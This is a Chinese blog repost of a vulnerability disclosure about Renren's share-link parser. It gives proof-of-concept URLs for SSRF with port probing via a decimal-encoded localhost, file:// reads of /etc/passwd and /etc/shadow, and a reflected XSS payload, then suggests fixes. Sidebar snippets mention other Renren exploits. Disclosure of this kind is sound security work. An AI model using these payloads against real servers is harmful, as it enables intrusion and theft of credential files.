人人网的分享网页功能存在诸多安全漏洞

最新推荐文章于 2022-08-18 14:17:48 发布
最新推荐文章于 2022-08-18 14:17:48 发布
阅读量366 收藏
点赞数
文章标签: hack web安全 网络安全 wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124091881
版权

漏洞详情

简要描述:

人人网的分享网页功能存在诸多漏洞. 这些漏洞可导致跨站攻击,任意文件读取,代理攻击和信息泄露等各种安全隐患.

详细说明:

人人网SNS社区的分享站外连接功能存在严重安全隐患, 其后台调用的Ajax接口为 http://share.renren.com/parse_share.do
向其接口提交参数link=*用于适用人人网服务器读取网络共享信息和视频图片信息等.但是由于底层适用类curl库,而没有正确过滤URL导致可以读取内网诸多信息.
如提交
http://share.renren.com/parse_share.do?link=http://2130706433
可读取127.0.0.1服务器上的信息. 也可做端口探测, 如http://share.renren.com/parse_share.do?link=http://2130706433:8080
原因是因为IP地址127.0.0.1可换算成为 (127*256^3)+(0*256^2)+(0*256)+1=2130706433, 访问2130706433此地址则代表访问127.0.0.1
另由于curl库支持多种协议, 如file://, ftp://, telnet://等, 并且file:// 支持目录读取, 导致服务器文件信息泄露, 可以读取任意的目录和文件.
如提交
http://share.renren.com/parse_share.do?link=file:///etc/passwd
http://share.renren.com/parse_share.do?link=file:///etc/sysconfig/
且由于其服务器运行在root权限上, 权限非常之大, 可读取shadow等内容用于暴力猜解密码.如:
http://share.renren.com/parse_share.do?link=file:///etc/shadow
并且该网页返回的Json信息没有经过HTML值过滤,可用于在Share.renren.com下制造跨站脚本用于攻击
http://share.renren.com/parse_share.do?link=%3Cinput%20οnclick=alert('Hola!wooyun!')%3E

漏洞证明:

http://share.renren.com/parse_share.do?link=%3Cinput%20οnclick=alert('Hola!wooyun!')%3E
http://share.renren.com/parse_share.do?link=http://2130706433:8080
http://share.renren.com/parse_share.do?link=file:///etc/shadow

修复方案:

对主机地址规则做正确的正则匹配,并且限制访问协议,做HTML输出过滤和降低WEB服务器权限等级.

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
人人网昨晚爆发XSRF安全漏洞
斑马哥
05-17 458
昨天人人逛街(j.renren.com)的安全漏洞爆发导致很多用户状态劫持。 然后网站出现各种调侃: 李拜壹 : 这么多年过去了CSRF还是防不住…… 王志亮: 随着各种高级以及正副优秀人才的不断引入,据说以后不会了。 陈蕾: 我想知道这些优秀人才是用来写代码的么?转自李拜壹 陈一舟的答案是: 陈一舟 vip : 优秀的开发文化... 并且有无辜用户抱怨当晚账户被封禁
关于CSDN的一个安全漏洞
weixin_33916256的博客
12-22 121
在浏览CSDN的博客是,偶然发现CSDN的一个安全漏洞,对于我们来可能没有什么攻击的必要,但是如果不修复,还是有很大的隐患的,下面贴出来看看<:_:> 如上图所示,通常在web浏览页面是,遇到不能访问的页面或者是目录,程序应该给予一个统一的错误提示,而且错误提示信息必须要屏蔽所有可能造成攻击的信息。 以上首先提示了HTTP404错误,表示找不到相应的请求资源; 接下来还提供了...
人人网相册漏洞:非好友可查看隐私相册
春晓春晓
08-27 9544
人人网的相册可设置为只对好友可见,但是今天一个偶尔的机会发现非好友也可以看到隐私相册,于是顺便就给一个好朋友留了言。 具体描述一下漏洞: (1) 首先自己要登陆,假设你要偷看的用户是A,然后搜索A的名字(前提你要知道他(她)叫什么哪个学校,户籍,性别等等)。 (2) 发现A的相册是只对好友开放的,不要急,看到地址栏里www.renren.com/后面的数字了吗?那是用户的唯一标识,对...
人人网验证不严格:个人网站轻松填手机号,有图有真相
数据库天地
08-02 236
笑而不语。。。。。 另外,根据推测,人人网数据库QQ号码字段长度是10。 实现方法:Firefox+Firebug
Advantech iView多个不同类型匿名RCE漏洞分享
include_voidmain的博客
08-18 357
Advantech iView多个不同类型匿名RCE漏洞分享
android分享人人网,人人网Android客户端体验
weixin_34221154的博客
05-25 502
人人网作为目前国内最大的SNS网站之一,它给不同身份的人提供了一个互动交流平台,提高用户之间的交流效率,所以其一直以来都有着众多的粉丝。而今天小编给大家推荐的则是人人网推出的最新版本的Android客户端软件,它将会给您带来全新的体验。人人网 for Android 官方客户端具有renren.com用户最常用的功能,拍照、传照片、写日志、看消息一应俱全。主要功能:新鲜事:新版新鲜事在浏览和使用流...
php分享到qq空间实现,桌面网页上实现分享功能分享到QQ空间、新浪微博、人人网...
weixin_42394913的博客
03-12 358
重要声明:本文章仅仅代表了作者个人对此观点的理解和表述。读者请查阅时持自己的意见进行讨论。在桌面网页上发现好文章时用户往往选择分享给朋友,而这时我们如何实现分享呢,本文列出了分享到:QQ、QQ空间、新浪微博、人人网 的api和分享代码。你不必再去到处找了。1、分享到QQAPI接口:https://connect.qq.com/widget/shareqq/index.html参数:字段含义url要...
人人网的用cookie进入
Black_God1的博客
08-14 354
import json from urllib import request, parse 保存cookie from http import cookiejar 通过对象保存cookie cookie_object = cookiejar.CookieJar() handler 对应着一个操作 handler = request.HTTPCookieProcessor(co...
前几天人人里的跨站攻击脚本
Rokkie的空间
05-01 529
<br />墙外地址:http://lzsblog.appspot.com/%3Fp%3D279002<br />转载请注明<br /> <br /><br />很显然这次事件的责任要归咎于人人。丫的<>你都不过滤,干什么吃的。<br /> <br />跨站脚本已经上传到google code 处防止被和谐。地址<br />http://code.google.com/p/ronaldliu/source/browse/trunk/attack.js<br />根据对这个脚本的初步分析,可以看出这个脚本能收
为什么人人网不做“分享”内容的搜索?
473687880
11-12 83
用得多了人人网的人会发现自己每天分享的东西特别多,可是有一天突然想起自己曾经分享过的某个东西,却很难找,因为那个极有可能是自己几个月前分享的,这就麻烦了,我一个月的分享量极大,怎么一个一个的找啊,真麻烦! 那为什么人人网不做这个功能呢? 其实回答很简单:做不了! 这种查询对于人人网来说太难了,也许只知道一点点sql知识的人会以为,这有什么难的,以主题的形式,like查询一下不就行了嘛? 哎...
renren-security开发文档3.2_完整版.pdf
07-31
人人权限系统是一套轻量级的权限系统,主要包括用户管理、角色管理、部门管理、菜单管 理、定时任务、参数管理、字典管理、文件上传、系统日志、APP模块等功能。其中,还拥有 多数据源、数据权限、Redis缓存动态开启与关闭、统一异常处理等技术特点。
解开人人网登录密码的 RSA 加密--转载
杂的文
06-11 3090
本文转载自:https://boj.blog.ustc.edu.cn/index.php/2014/05/renren-password-transfer-security/,纯粹基于兴趣留作记录。yixia
突破权限查看人人网特定用户所有相册(加密除外)的算法
热门推荐
无知的我
01-06 2万+
在学校论坛上看见一个chrome插件,可以用来进行人人网搜索,查看照片,方便好用,在此共享,下载地址:猛击这里下载 以下是该工具的设计思路 steps:                                          1.访问对方主页,发现“相册”处为灰色,无法进入,没关系。复制下Ta的人人网id 2.访问:http://photo.renren.co
使用人人网开源API的站内应用开发
HeyLinK的专栏
03-14 613
前端时间接触了一下人人网的开源API系统。分享一下自己的经验。   首先就是进入人人网开放平台官网 http://dev.renren.com/ 创建自己的一个站内用用         具体的创建流程在此就不多做解释。 附上官网教程的地址: http://wiki.dev.renren.com/wiki/WEB%E7%AB%99%E5%86%85%E5%BA%94%E7%94%...
人人API
com_xpp的专栏
02-27 162
API 列表 接口分类 接口名 描述 用户信息 users.getInfo 得到用户的信息,支持批量获取。 users.getLoggedInUser 得到当前session的用户ID。 users.hasAppPermission 根据用户的id,以及相应在人人网的操作权限(接收email,更新状态等),来判断用户是否可以进行此操作。 u...
renren-security v5.1 发布,轻量级脚手架,接私活的好帮手
Juziku的专栏
07-15 880
renren-security 是一套轻量级脚手架,接私活的好帮手!
人人网第三方应用SQL注入漏洞
swordheart的博客
04-14 552
漏洞详情 披露状态: 2010-07-24: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-23: 细节向公众公开 简要描述: 人人网第三方应用SQL注入漏洞 详细说明: 某第三方应用php过滤不严导致的SQL注入漏洞 漏洞证明: http://apps.renren.com/tod
轻量级权限管理系统(renren-security)
JAVA
01-10 1017
项目说明 1、renren-security是一个轻量级权限管理系统,其核心设计目标是开发迅速、学习简单、轻量级、易扩展2、使用renren-security搭建项目,只需编写30%左右代码,其余的代码交给系统自动生成3、一个月的工作量,一周就能完成,剩余的时间可以陪家人、朋友、撩妹、钓凯子等,从此踏入高富帅、白富美行业 项目特点 1、轻量级的权限系统,只涉及Spring、Shiro、M...
跨域资源共享漏洞分析总结(含实战)
qq_43571759的博客
04-29 7099
文章目录跨源资源共享(CORS)浏览器的同源策略概念特点主要功能跨域主要跨域请求方法JSONP跨域CORS跨域CORS的安全问题三种不安全的配置引起的安全问题通过CORS信任关系 利用XSS使用错误的CORS破坏TLS防御CORS如何预防基于CORS的攻击正确配置跨域请求只允许信任的网站避免将null列入白名单避免在内部网络中使用通配符CORS不能替代服务器端安全策略 跨源资源共享(CORS) 浏...
人人网API接口说明文档
最新发布
09-11
人人网API接口说明文档提供了针对该社交网络平台的一系列功能调用,主要关注于与用户连接、通知配额管理以及好友关系管理相关的操作。以下是文档中提到的几个关键接口及其详细说明: 1. **admin.getAllocation**: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值